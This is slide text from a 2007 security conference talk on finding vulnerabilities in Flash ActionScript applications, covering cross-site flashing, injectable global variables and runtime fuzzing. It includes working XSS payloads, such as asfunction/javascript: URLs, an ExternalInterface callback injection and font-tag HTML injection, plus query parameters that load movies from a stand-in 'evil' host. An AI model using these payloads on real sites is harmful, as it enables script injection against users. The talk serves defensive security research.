Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity [email protected] +393209495590 OWASP & WASC AppSec 2007 Conference San Jose – Nov 2007 http://www.webappsec.org/ Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/ The OWASP Foundation http://www.owasp.org/ $ Whoami^J Stefano Di Paola: CTO & Co-Founder Minded Security Security Engineer & Researcher Web App Pen Tester Code Review and Forensic Vulnerabilities (PDF UXSS & Others) OWASP Italy R&D Director OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 2 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 3 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 4 Objectives Focus on Flash ActionScript 2 Applications Security Understand the attack flow Dead Code Analysis Methodology Runtime Analysis Methodology OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 5 Flash Apps - Security Concerns Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser. Can forge binary requests and HTTP Requests. Can execute external Flash Movies. Can play Audio/Video files natively. Can display minimal HTML code inside a TextField. OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 7 SWF Client Side Attacks This new attack vector was presented @ OWASP 2007 Appsec Conference in Milan, Italy Relies on flawed SWF files and not on SWF parser A flawed SWF is a SWF which could allow classical XSS Cross Site Flashing (the dark side of cross movie scripting) OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 8 Cross Site Flashing (XSF) XSF occurs when from different domains: One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling: GetVariable: access to flash public and static object from javascript as a string. SetVariable: set a static or public flash object to a new string value from javascript. Unexpected Browser to SWF communication could result in stealing data from SWF application OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 9 Accomplishing an Attack using flawed SWF When a link to a flawed SWF is directly pasted to the location bar every browser automatically generates some HTML with Object and/or Embed tags: <html> <body marginwidth="0" marginheight="0"> <embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf" type="application/x-shockwave-flash"/> </body> </html> OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 10 Attack Example to a Flawed SWF A flawed SWF was uploaded to vi.ct.im Host. Contains the following code v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarge t', 10); var v2 = new XML(); v2.load(_root.test); }; Let's see what an attacker could do with a browser (Video) OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 11 Accomplish an attack So clicking and redirecting to a SWF will let the browser execute it on the main window. Works with every browser. IE7 needs: try{code}catch(e){location.re load()} Iframe 'src' could be used too. Tested on Firefox SWF/Browser interaction doesn't work in IE7 using javascript:. We'll see when it works even with IE7 OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks URL QueryString Global Uninitialized Variables flashVars External Movies Remote XML files MP3 and Flv Movies Embedded HTML OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 Register Globals in ActionScript Similar to PHP Register Globals Every uninitialized variable with global scope is a potential threat: _root.* _global.* _level0.* .* if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml'); It is easy to add it as a parameter in the query string: http://URL?language=http://evil OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 15 Register Globals in Included Files 1/2 Assumptions made for _leveln movies are wrong when a movie supposed to be at level1 is loaded as _level0 _level(n-1).* /* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ...... OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 16 Register Globals in Included Files 2/2 Then let's load upperlev.swf and then use query string to initialize DEMO_PATH: http://host/upperlev.swf?DEMO_PATH=http://evil /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ...... OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 17 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis Static Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 Attack Patterns – Quick Reference Some Attack patterns were already described in: Testing Flash Applications http://www.wisec.it/docs.php?id=5 A quick reference of attack patterns which trigger XSS in SWF: asfunction:getURL,javascript:alert('XSS') javascript:alert('XSS') <img src='javascript:alert(“XSS”)//.jpg'> http://evil.ltd/evilversion7.swf OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 19 Attack Patterns – Quick Reference A quick reference of PDNF and Objects where attack pattern could be injected: getURL load*(URL,..) Functions loadVariables(url, level ) LoadMovie ( url, target ) LoadMovieNum( url, level ) XML.load ( url ) LoadVars.load ( url ) Sound.loadSound( url , isStreaming ); NetStream.play( url ); TextField.htmlText OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 20 Attack Patterns – GetURL New Issue The GET issue^N^N^N^N^Nfeature: getURL('javascript:SomeFunc(“someValue”)','','GET') From Adobe: “..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..” if a SWF contains the above, a request like http://victim/noundef.swf?a=0:0;alert(' XSS') becomes: javascript:SomeFunc(“someValue”)?a=0:0;alert(123) Credits go to SirDarckCat and Kuza55 who found it OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 21 Attack Patterns – ExternalInterface New Issue flash.external.ExternalInterface.call syntax public static call(methodName:String, [parameter1:Object]) Actually, methodName could be any Javascript code. In fact, when call('method123') is executed, a javascript function is called (www.develotec.com/flash8api.txt): try { __flash__toXML(method123()) ; } catch (e) { "<undefined/>"; } OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 22 External Interface Attack What happens if a SWF contains: flash.external.ExternalInterface.call(_ root.callback) http://host/swf?callback=(new Function(“alert(‘Xss’)”)) __flash__toXML((new Function(“alert(‘Xss’)”))()) Works with Iframe and IE7 too OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 Attack Patterns – Font New Issue Some code like createTextField("txt", 999, 10, 10, 320, 240); txt.html=true; var _tf:TextFormat = new TextFormat(); _tf.font = _root.fontFamily; txt.setTextFormat( _tf ); txt.htmlText='something'; Rewrites ‘something’ to <p font=“TIMES”>something</p> That could be exploited by injecting: fontFamily = '”><img src=”http://evil/evil.swf”><”' OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 24 Modify the Data Flow 1/4 Multiple classes and packages are often used to separate functionality. In Flash, every class/package like class simpleClass{} is compiled in the following way: push 'simpleClass' getVariable not not branchIfTrue label1 ... label1 end OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 25 Modify the Data Flow 2/4 Decompiled by flare, results in: if (!simpleClass) { _global.simpleClass = function () {}; ... } So simpleClass is a _global attribute. This means that it's initially undefined. So it can be instantiated with a string value from the query string OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 26 Modify the Data Flow 3/4 Suppose there is a class like: class simpleUtils { static public function testForSomething(){ if(ok) return true; else return false; } ... class simpleClass { static function main(){ if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")'); } ... OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 27 Modify the Data Flow 4/4 Sending the request: http://host/swf.swf?simpleUtils=blah sets the object simpleUtils to an instantiated string, so: simpleUtils.testForSomething() becomes undefined and the flow is modified. if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")'); OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 28 Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 29 Recipe for Runtime Analysis A method to find uninitialized variables A SWF Container which loads the external one One array of attack patterns A framework to mix our ingredients OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 30 Find Undefined Vars @ Runtime Definition of __resolve: from Adobe: “a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method. If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.” As we need to find _root.* or _global.* undefined variables: _root.__resolve = function (name){ // name is undefined } OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 31 Attack Patterns Array From our knowledge base, an attack Array will contain the following elements: Direct load asfunction: getURL,javascript:gotRoot("")///d.jpg Controlled Evil Page/Host: http://at.tack.er/evil.swf Flash Html Injection: “'><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' > Dom Injection: (gotRoot('')) Js/Flash Error: “'|!$%&/)= OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 32 A SWF Container The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables The wrapper will contain __resolve methods for _root and _globals. var image_mcl = new MovieClipLoader(); image_mcl.addListener(mclListener); _root._lockroot=true image_mcl.loadClip( _root.swfurl+"?"+ _root.varToSend, _root.varTarget); OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 33 A framework: SWFRTAnalyzer OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 34 Conclusions A free version of the SWF Runtime Analyser will be released by Minded Security. Awareness about ActionScript security is growing but is still a drop in the ocean. There is still a lot of research to do about Actionscript security. OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 35 Thank you :) Questions? Web: http://www.mindedsecurity.com Weblog: http://www.wisec.it Email: stefano.dipaola_at_mindedsecurity.com OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 36
© Copyright 2024